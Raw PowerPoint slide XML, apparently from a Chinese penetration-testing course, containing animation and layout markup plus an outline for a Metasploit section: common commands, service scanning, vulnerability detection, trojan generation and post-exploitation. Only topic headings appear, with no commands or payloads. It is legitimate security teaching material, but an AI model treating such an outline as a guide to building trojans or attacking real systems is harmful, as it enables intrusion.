                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
